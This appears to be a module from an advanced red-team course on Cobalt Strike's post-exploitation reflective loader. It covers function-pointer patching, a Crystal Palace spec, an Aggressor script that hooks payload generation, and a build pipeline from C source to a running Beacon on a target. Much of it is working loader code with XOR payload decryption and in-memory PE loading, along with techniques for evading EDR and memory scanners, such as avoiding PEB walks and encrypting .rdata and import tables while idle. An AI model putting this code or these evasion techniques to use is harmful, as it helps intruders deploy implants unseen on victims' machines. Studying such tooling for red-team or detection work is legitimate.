Difficulty: Advanced

Module 7: Post-Ex UDRL & Aggressor Integration

The postex loader, $GMH/$GPA patching, string-based DFR, Aggressor hooks, and the complete build pipeline from C source to deployed Beacon.

Module Objective

Understand how Cobalt Strike's post-exploitation DLLs are loaded by a separate, simplified UDRL. You will learn how the postex loader differs from the Beacon UDRL, how it receives API resolution capabilities from its parent Beacon via $GMH/$GPA patching, and how the Aggressor script ties the entire Crystal-Loaders system together. By the end of this module you will be able to trace a complete payload from C source through Crystal Palace to a running Beacon on target.

1. What Is Post-Ex?

Cobalt Strike's post-exploitation capabilities — mimikatz, screenshot, keylogger, port scan, hashdump, net commands, and many others — are implemented as standalone DLLs. When an operator runs one of these commands through the Beacon console, Cobalt Strike compiles or selects the appropriate postex DLL and sends it to the running Beacon for execution.

These postex DLLs need their own loader. The initial Beacon UDRL (covered in Modules 5 and 6) loads the Beacon implant itself, but every subsequent postex capability that arrives as a DLL also needs to be reflectively loaded into memory. Cobalt Strike provides a dedicated hook for this purpose: POSTEX_RDLL_GENERATE.

Why a Separate Loader?

The postex loader is architecturally simpler than the Beacon UDRL because it operates in a fundamentally different context. The Beacon is already running, API resolution is already solved, syscall stubs are already resolved, and the BUD (Beacon User Data) is already populated. The postex loader does not need to bootstrap any of this infrastructure — it inherits resolution capabilities from its parent Beacon via function pointer patching.

Key Distinction

The POSTEX_RDLL_GENERATE Aggressor hook allows operators to replace the default postex loader with a custom one — just as BEACON_RDLL_GENERATE allows replacing the Beacon's own loader. Crystal-Loaders provides both: a full-featured Beacon UDRL and a streamlined postex UDRL, each with its own spec file and C source.

2. Key Differences from the Beacon UDRL

The postex loader shares the same Crystal Palace build system and LibTCG PE loading primitives as the Beacon UDRL, but it strips away everything that the parent Beacon already provides. The following table highlights every architectural difference:

AspectBeacon UDRL (loader.c)Post-Ex UDRL (loader.c)
Includesbeacon.h, gate.h, tcg.htcg.h only
Syscall resolutionFull SYSCALL_API via LibGateNone needed
DFR methodror13 (hash-based)strings (ASCII name-based)
API resolutionPEB walking via findModuleByHash$GMH/$GPA from parent Beacon
BUD populationFull BEACON_USER_DATANone
Entry paramsgo() takes no argsgo(void* loaderArguments)
DllMain calls3 (BEACON_USER_DATA, ATTACH, START)2 (ATTACH, START)
Memory trackingALLOCATED_MEMORY_REGIONRDATA_SECTION
Section maskingFull section tracking.rdata capture only

The most striking reduction is in dependencies. The Beacon UDRL includes beacon.h (for BUD structures), gate.h (for LibGate syscalls), and tcg.h (for PE loading). The postex loader only needs tcg.h because it does not resolve syscalls and does not populate BUD. It is purely a PE loading engine with inherited API resolution.

Why This Matters for Evasion

A smaller loader means a smaller PIC blob, which means less code in memory to scan, fewer function calls to trace, and a reduced detection surface. The postex loader also avoids touching the PEB directly (it uses patched-in function pointers instead of PEB walking), which sidesteps PEB access monitoring that some EDR products implement.

3. The $GMH / $GPA Patching Mechanism

The central design question for the postex loader is: how does it resolve Windows API functions without PEB walking and without LibGate? The answer is function pointer patching. The parent Beacon already has resolved addresses for GetModuleHandleA and GetProcAddress. Crystal Palace writes those addresses directly into the postex loader's code before it executes.

Global Function Pointers in .text

The postex loader.c declares two global function pointers with an unusual attribute — they are placed in the .text section instead of .data:

C (postex/loader.c)// Global function pointers stored in .text section
__typeof__(GetModuleHandleA) * pGetModuleHandle __attribute__((section(".text")));
__typeof__(GetProcAddress)   * pGetProcAddress  __attribute__((section(".text")));

Placing them in .text is deliberate. After Crystal Palace transforms the COFF object into PIC, the .text section becomes the executable code body. By placing the pointers here, they become part of the PIC blob itself — directly addressable via RIP-relative instructions. If they were in .data, Crystal Palace would need to handle an additional data section and relocations.

The patch Directive

The postex spec file uses Crystal Palace's patch directive to write values into these symbol locations:

loader.spec (postex)name     "Beacon Postex Loader"
describe "PIC loader for Cobalt Strike's postex DLLs"
author   "Daniel Duggan (@_RastaMouse)"

x64:
    load "bin/loader.x64.o"
        make pic +gofirst +optimize +disco
        dfr "resolve" "strings"
        patch "pGetModuleHandle" $GMH
        patch "pGetProcAddress"  $GPA
        mergelib "../libtcg.x64.zip"

    generate $KEY 128
    push $DLL
        xor $KEY
        preplen
        link "dll"
    push $KEY
        preplen
        link "key"
    export

The $GMH and $GPA variables are not defined in the spec itself. They are provided externally by the Aggressor script at runtime, which receives them from Cobalt Strike as parameters to the POSTEX_RDLL_GENERATE hook. Crystal Palace resolves the symbol names "pGetModuleHandle" and "pGetProcAddress" in the COFF object's symbol table and overwrites those locations with the 8-byte addresses provided by $GMH and $GPA.

$GMH / $GPA Patching Flow

Parent Beacon
has resolved GMH/GPA
CS Engine
passes to Aggressor hook
Crystal Palace
patch directive
PIC Blob
pointers baked in .text

Comparing Spec Directives: Beacon vs Post-Ex

DirectiveBeacon SpecPost-Ex Spec
dfr"resolve" "ror13""resolve" "strings"
patchNot usedpatch "pGetModuleHandle" $GMH
patch "pGetProcAddress" $GPA
mergelibLibGate + LibTCGLibTCG only

4. The Post-Ex resolve() Function

Because the postex spec uses dfr "resolve" "strings", Crystal Palace rewrites all __imp_MODULE$Function references to call resolve() with ASCII string arguments instead of ROR13 hashes. The postex resolve() function is correspondingly different from the Beacon UDRL's version:

C (postex/loader.c)char * resolve(char * module, char * function)
{
    HANDLE hModule = pGetModuleHandle(module);

    if (hModule == NULL)
        hModule = LoadLibraryA(module);

    return pGetProcAddress(hModule, function);
}

This function is deceptively simple, but every line is significant:

Line-by-Line Analysis

LineWhat It Does
pGetModuleHandle(module)Attempts to get a handle to the module using the patched $GMH pointer. This succeeds if the DLL is already loaded in the process (e.g., kernel32.dll, ntdll.dll).
if (hModule == NULL)If the module is not already loaded, the function needs to load it first. This happens when postex DLLs import from less common DLLs.
LoadLibraryA(module)Calls LoadLibraryA directly to load the module. This is available as a plain function call because it comes from <windows.h> and is not DFR-decorated.
pGetProcAddress(hModule, function)Finally resolves the target function from the (now loaded) module and returns its address.

Comparison with Beacon UDRL resolve()

Beacon UDRL resolve()
  • Takes two DWORD hashes (ROR13)
  • Walks the PEB's InMemoryOrderModuleList
  • Hashes each module name, compares against moduleHash
  • Walks export table, hashes each function name
  • No dependency on any external function pointers
  • Fully self-contained — works from a cold start
Post-Ex resolve()
  • Takes two ASCII strings (module name, function name)
  • Calls pGetModuleHandle (patched $GMH)
  • Falls back to LoadLibraryA (direct call, not DFR-decorated) if module not loaded
  • Calls pGetProcAddress (patched $GPA)
  • Depends on parent Beacon's function pointers
  • Cannot operate independently — requires a running Beacon

5. RDATA_SECTION Tracking

The Beacon UDRL tracks all allocated memory regions via ALLOCATED_MEMORY_REGION structures in the BUD. The postex loader uses a simpler tracking mechanism: it captures only the .rdata section's location and size.

C (postex/loader.c)typedef struct {
    char * start;      // Start address of .rdata
    DWORD  length;     // Size of .rdata
    DWORD  offset;     // Offset of IAT within .rdata
} RDATA_SECTION;

Why Track .rdata?

Long-running postex DLLs — such as the keylogger, screenshot capture loop, or port scanner — persist in memory for extended periods. While they are idle between operations, their memory is vulnerable to scanning. The .rdata section is the highest-value forensic target because it contains:

What Lives in .rdata

By passing the RDATA_SECTION structure to the postex DLL via DllMain(DLL_PROCESS_ATTACH, &rdata), the DLL can XOR-encrypt or zero its own .rdata section while idle. When it needs to run again, it decrypts the section, performs its operation, and re-encrypts. This pattern is the postex equivalent of the sleep mask technique used by the Beacon itself.

RDATA Obfuscation Lifecycle

Postex DLL loaded
.rdata populated with IAT
Operation completes
keylogger cycle done
XOR encrypt .rdata
using RDATA_SECTION info
Idle (safe)
no readable IAT in memory

6. The Post-Ex go() Function

The postex go() function is the entry point of the PIC blob. Crystal Palace places it at byte offset 0 via the +gofirst flag. Unlike the Beacon UDRL's go() (which takes no arguments), the postex version receives a loaderArguments pointer from the parent Beacon:

C (postex/loader.c)void go(void * loaderArguments)
{
    RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
    RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);

    // XOR unmask the encrypted postex DLL
    char * src = KERNEL32$VirtualAlloc(
        NULL, dll->length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    for (DWORD i = 0; i < dll->length; i++)
        src[i] = dll->value[i] ^ key->value[i % key->length];

    // Parse the decrypted PE
    DLLDATA data;
    ParseDLL(src, &data);

    // Allocate and load sections
    IMPORTFUNCS funcs;
    DWORD size = SizeOfDLL(&data);
    char * dst = KERNEL32$VirtualAlloc(
        NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LoadDLL(&data, dst);
    ProcessImports(&funcs, &data, dst);

    // Fix permissions and capture .rdata info
    RDATA_SECTION rdata;
    FixSectionPermissions(&data, dst, &rdata);

    // Get entry point and clean up decryption buffer
    DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);
    KERNEL32$VirtualFree(src, 0, MEM_RELEASE);

    // Two DllMain calls (no USER_DATA needed)
    entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, &rdata);               // pass rdata info
    entryPoint((HINSTANCE)GETRESOURCE(go), 0x04, loaderArguments);  // start with loader args
}

Each phase of this function maps directly to a stage in the loading process:

Phase-by-Phase Breakdown

PhaseLinesWhat Happens
Resource RetrievalGETRESOURCEThe _DLL_ and _KEY_ macros resolve to named sections that Crystal Palace linked into the PIC blob. GETRESOURCE uses RIP-relative addressing to locate them.
XOR DecryptionVirtualAlloc + XOR loopAllocates a RW buffer (src) and decrypts the postex DLL using a rolling XOR with the 128-byte key. The decrypted buffer is a raw PE file.
PE ParsingParseDLLLibTCG parses the PE headers, section table, import directory, and relocation table into a DLLDATA structure.
Section LoadingLoadDLLAllocates the final image region (RW) and copies each PE section to its correct virtual address offset.
Import ResolutionProcessImportsTakes an IMPORTFUNCS struct, the DLLDATA, and dst. Walks the import directory and resolves each function using the DFR-rewritten resolve(), which delegates to the patched $GMH/$GPA.
Permission FixingFixSectionPermissionsSets correct page protections for each section (.text to RX, .rdata to R, .data to RW). Captures .rdata boundaries into the RDATA_SECTION struct.
CleanupVirtualFreeReleases the temporary decryption buffer (src). The encrypted DLL data and XOR key are no longer needed.
DllMain #1DLL_PROCESS_ATTACHCalls the postex DLL's entry point with (HINSTANCE)dst and &rdata as the reserved parameter, giving it the information needed for .rdata obfuscation.
DllMain #20x04Calls DllMain again with reason 0x04, passing (HINSTANCE)GETRESOURCE(go) as the module handle and loaderArguments from the parent Beacon, starting the actual postex operation (mimikatz dump, screenshot capture, etc.).

Contrast with Beacon UDRL go()

The Beacon UDRL's go() function makes three DllMain calls:

Beacon UDRL: Three DllMain Calls

  1. entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud) — passes the BEACON_USER_DATA structure using the special DLL_BEACON_USER_DATA reason code and (HINSTANCE)0 as the module handle
  2. entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL) — standard DLL initialization with the actual loaded image base
  3. entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL) — starts the Beacon main loop

The postex loader skips the first call entirely because there is no BEACON_USER_DATA to pass. Postex DLLs do not need syscall stubs or memory region tracking — they operate within the context of an already-running Beacon that handles those concerns.

7. The Aggressor Script (crystalpalace.cna)

The Aggressor script is the glue that connects Crystal Palace to Cobalt Strike's runtime. It implements the hooks that Cobalt Strike calls when it needs to generate loader payloads, passing the appropriate parameters to the Crystal Palace linker.

Java/Sleep (crystalpalace.cna)import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;

set BEACON_RDLL_GENERATE {
    local('$spec $spec_path $result');

    // $1 = filename, $2 = beacon DLL bytes, $3 = arch
    if ($3 eq "x86") { return $null; }  // x64 only

    $spec_path = getFileProper(script_resource("udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    $result = [$spec run: $2, new HashMap];

    if (strlen($result) == 0) {
        warn("Crystal Palace: BEACON_RDLL_GENERATE failed");
        return $null;
    }

    return $result;
}

set BEACON_RDLL_SIZE {
    return "0";  // dynamic size
}

set POSTEX_RDLL_GENERATE {
    local('$spec $spec_path $hashMap $result');

    // $1 = filename, $2 = postex DLL bytes, $3 = arch
    // $4 = beacon ID, $5 = $GMH, $6 = $GPA
    if ($3 eq "x86") { return $null; }

    $spec_path = getFileProper(script_resource("postex-udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    $hashMap = new HashMap;
    [$hashMap put: "\$GMH", cast($5, 'b')];
    [$hashMap put: "\$GPA", cast($6, 'b')];

    $result = [$spec run: $2, $hashMap];

    if (strlen($result) == 0) {
        warn("Crystal Palace: POSTEX_RDLL_GENERATE failed");
        return $null;
    }

    return $result;
}

The three hooks each serve a distinct purpose in the payload generation pipeline. Note that in Cobalt Strike's Sleep language, the set keyword assigns named hook callbacks (such as RDLL hooks), while on registers event handlers — these are different mechanisms. The import java.util.HashMap at the top makes the Java HashMap class available for passing patch variables.

BEACON_RDLL_GENERATE

Hook: BEACON_RDLL_GENERATE

When it fires: Every time Cobalt Strike generates a Beacon payload (HTTP listener, HTTPS listener, SMB pipe, etc.).

Parameters received:

What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the Beacon UDRL spec. Feeds it the Beacon DLL bytes (which become $DLL in the spec) and returns the complete PIC payload. The new HashMap is empty because the Beacon spec has no external variables to patch. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.

Return value: The final PIC shellcode blob, or $null if the architecture is x86 (Crystal-Loaders is x64-only) or if Crystal Palace fails.

BEACON_RDLL_SIZE

Hook: BEACON_RDLL_SIZE

When it fires: Before BEACON_RDLL_GENERATE, to determine how much space to reserve for the loader.

Return value: "0" indicates the loader size is dynamic. Crystal Palace determines the exact size at link time based on the code, libraries, and encrypted payload. Returning "0" tells Cobalt Strike not to pre-allocate a fixed buffer but to accept whatever size Crystal Palace produces.

POSTEX_RDLL_GENERATE

Hook: POSTEX_RDLL_GENERATE

When it fires: Every time an operator runs a postex command (mimikatz, screenshot, keylogger, etc.) that requires loading a DLL into the Beacon process.

Parameters received:

What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the postex spec. Constructs a HashMap containing $GMH and $GPA as byte arrays (via cast($5, 'b')), and passes both the DLL bytes and the hash map to Crystal Palace. The patch directives in the spec resolve $GMH and $GPA from this hash map. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.

Return value: The complete postex PIC payload with patched-in function pointers, or $null on failure.

The HashMap is the Bridge

The key insight is how data flows from Cobalt Strike through Aggressor into Crystal Palace. The $GMH and $GPA values originate from the running Beacon on the target machine. Cobalt Strike resolves them from Beacon's process context, passes them as parameters to the Aggressor hook, and the script packages them into a HashMap that Crystal Palace reads when processing patch directives. By the time the PIC blob is assembled, the correct function addresses are baked directly into the shellcode's .text section.

8. The Full Build Pipeline

From writing C source code to a running Beacon on target, the Crystal-Loaders system involves eight distinct stages. The following diagram traces the complete pipeline:

Complete Crystal-Loaders Build Pipeline

1. Write C Loader — Author loader.c with go() entry point, resolve() function, and PE loading logic using LibTCG primitives.
2. Compile with MinGWx86_64-w64-mingw32-gcc -c loader.c -o bin/loader.x64.o produces a COFF object file. The -c flag stops before linking.
3. Write Spec File — Author loader.spec defining the PIC transformation, DFR method, library merges, payload encryption, and data linking.
4. CS Triggers Hook — At runtime, Cobalt Strike fires BEACON_RDLL_GENERATE (or POSTEX_RDLL_GENERATE), passing the raw DLL bytes and architecture info to the Aggressor script.
5. Aggressor Loads Spec — The .cna script calls LinkSpec Parse to load and parse the spec file, preparing the Crystal Palace linker engine.
6. Crystal Palace Executes — The linker performs six sub-operations:

Crystal Palace Sub-Operations (Step 6)

Sub-StepOperationResult
6aLoad loader.x64.oCOFF object loaded into linker memory
6bmake pic +gofirst +optimize +discoCOFF transformed to PIC with go() at offset 0
6cdfr "resolve" "ror13" (or "strings")All DLL import references rewritten to call resolve()
6dmergelib LibGate + LibTCG (or LibTCG only)Library code merged into the PIC blob
6egenerate $KEY 128128-byte random XOR key created
6fpush $DLL / xor / preplen / linkDLL XOR-encrypted, length-prefixed, linked as named section
7. CS Wraps PIC Blob — Cobalt Strike takes the exported PIC blob and wraps it into the appropriate delivery mechanism (stager shellcode, staged payload, or raw artifact).
8. Execution on Target — The stager delivers the PIC blob to the target process. Execution begins at byte 0 (go()). The loader decrypts the embedded DLL, loads it via LibTCG, resolves imports via DFR, and calls DllMain to start Beacon.

Pipeline Summary

The pipeline transforms human-readable C code into a flat, encrypted, position-independent shellcode blob that loads a full-featured DLL implant from memory. At no point in this pipeline does a traditional PE file exist in the target process's memory. The DLL is encrypted inside the PIC blob, decrypted into a temporary buffer, loaded section-by-section into a final allocation, and the temporary buffer is freed. The only persistent artifacts are the PIC code itself (which has no PE headers) and the loaded DLL sections (which have correct per-section permissions instead of a single RWX blob).

Module 7 Knowledge Check

Q1: How does the postex loader resolve Windows API functions?

The postex loader declares global function pointers (pGetModuleHandle and pGetProcAddress) in the .text section. Crystal Palace's patch directive writes the parent Beacon's GetModuleHandleA ($GMH) and GetProcAddress ($GPA) addresses into these locations at link time. The postex resolve() function then uses these patched pointers to resolve all API imports. No PEB walking or syscalls are needed.

Q2: What Aggressor hook handles Beacon UDRL generation?

BEACON_RDLL_GENERATE fires every time Cobalt Strike generates a Beacon payload. It receives the raw Beacon DLL bytes, architecture string, and filename hint. The Aggressor script loads the Beacon UDRL spec file and returns the Crystal Palace PIC output. POSTEX_RDLL_GENERATE handles postex DLL loading, BEACON_RDLL_SIZE reports the loader size, and ARTIFACT_GENERATE is a different hook for artifact packaging.

Q3: Why does the postex loader track RDATA_SECTION instead of full ALLOCATED_MEMORY?

Long-running postex DLLs like keyloggers and screenshot loops persist in memory for extended periods. Their .rdata section contains the resolved Import Address Table (IAT), which holds function pointers that memory scanners can identify as evidence of a loaded PE. By tracking the .rdata section's start address, size, and IAT offset via the RDATA_SECTION structure, the postex DLL can XOR-encrypt its own .rdata while idle and decrypt it only when actively executing, similar to how the Beacon's sleep mask protects its own memory.